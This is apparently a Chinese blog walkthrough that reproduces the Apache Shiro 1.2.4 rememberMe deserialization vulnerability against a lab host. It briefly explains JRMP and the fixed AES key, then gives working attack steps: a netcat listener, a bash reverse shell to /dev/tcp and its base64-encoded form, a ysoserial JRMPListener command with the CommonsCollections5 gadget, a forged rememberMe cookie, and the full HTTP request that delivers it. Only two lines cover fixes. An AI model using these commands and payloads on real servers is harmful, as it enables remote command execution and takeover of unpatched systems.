Shiro1.2.4反序列化漏洞

Shiro1.2.4反序列化漏洞

一、JRMP协议

​ JRMP全称为Java Remote Method Protocol,也就是Java远程方法协议。是RMI(Remote Method Invocation)工作的底层协议。

二、漏洞原理

​ Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。

个人理解:(不一定正确)

Apache Shiro反序列化漏洞,主要是因为用户的信息通过序列化、AES加密,base64加密后存储在Cookie的remember-me字段中,而攻击者可以通过构造remember-me字段中的参数,当传到后端服务器时,服务器会对remember-me字段进行base64解密,AES解密,反序列化去连接JRMP服务,当访问到JRMP服务时,会发送一个base64编码的反弹连接给服务器,服务器解码就会自动执行反弹连接。这里AES加密密钥是固定的,也是造成原因的一部分原因。

三、复现步骤

1、kali(192.168.142.133)上监听6666端口

nc -lvp 6666

2、对反弹连接进行编码

编码网址:https://ares-x.com/tools/runtime-exec/

bash -i >& /dev/tcp/192.168.142.133/6666 0>&1

编码后:

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Mi4xMzMvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}

3、用ysoserial开启JRMP监听(可在windows上运行,也可在linux上运行)

java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 8888 CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Mi4xMzMvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}"

4、用shiro.py脚本进行AES加密、base64编码

python shiro.py 192.168.142.1:8888

输出内容为:

rememberMe=kcsXiGTWRTCTQnw3pjWUu0gg0tCiFg+TYpRxFUG5VkeiW5Mikx9fazx/UVsHKg3jYm0wZ0/N7Im4w0pJheg4n0TvApMQsFzcR6+I4uA+Fow1hR1iLMxhLVixyZdUEj5zwBqOXnK+Ju3ikfry+wwqscqtkzjZFe40uI+Fxdynw7bi4sCA6SY48UULNiIdeVRrwvqe7nfA+ZihSolHG4UaTvX+ySSiYzBfqKsN5RJWPbvzUWvSXXdaQE0ch7jtCYxYw+vTcSrEW9yj94KgJPQa6ZqaTbFFqG08obLGxGVJ5v2h+XGHro4wxkg0HiY+gkfgdLEt8gGcLmd3IJSLzlOWnv9KBnYN7vfXpfuZ7/P5tA3VIVapyFjx3qvY4zkSc/Q/VGuUis75k856P3Af3q+HwA==

5、用bp发送payload

POST /doLogin HTTP/1.1
Host: 192.168.142.133:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Origin: http://192.168.142.133:8080
Connection: close
Referer: http://192.168.142.133:8080/login;jsessionid=0B0A2E71C16C929317001BA8542BD94E
Cookie: JSESSIONID=0B0A2E71C16C929317001BA8542BD94E;rememberMe=kcsXiGTWRTCTQnw3pjWUu0gg0tCiFg+TYpRxFUG5VkeiW5Mikx9fazx/UVsHKg3jYm0wZ0/N7Im4w0pJheg4n0TvApMQsFzcR6+I4uA+Fow1hR1iLMxhLVixyZdUEj5zwBqOXnK+Ju3ikfry+wwqscqtkzjZFe40uI+Fxdynw7bi4sCA6SY48UULNiIdeVRrwvqe7nfA+ZihSolHG4UaTvX+ySSiYzBfqKsN5RJWPbvzUWvSXXdaQE0ch7jtCYxYw+vTcSrEW9yj94KgJPQa6ZqaTbFFqG08obLGxGVJ5v2h+XGHro4wxkg0HiY+gkfgdLEt8gGcLmd3IJSLzlOWnv9KBnYN7vfXpfuZ7/P5tA3VIVapyFjx3qvY4zkSc/Q/VGuUis75k856P3Af3q+HwA==
Upgrade-Insecure-Requests: 1

username=1&password=1&rememberme=remember-me

四、修复和防御

1、升级Apache Shiro

2、部署安全产品

热门相关:骑士归来   夫人你马甲又掉了   战神   夫人你马甲又掉了   重生之至尊千金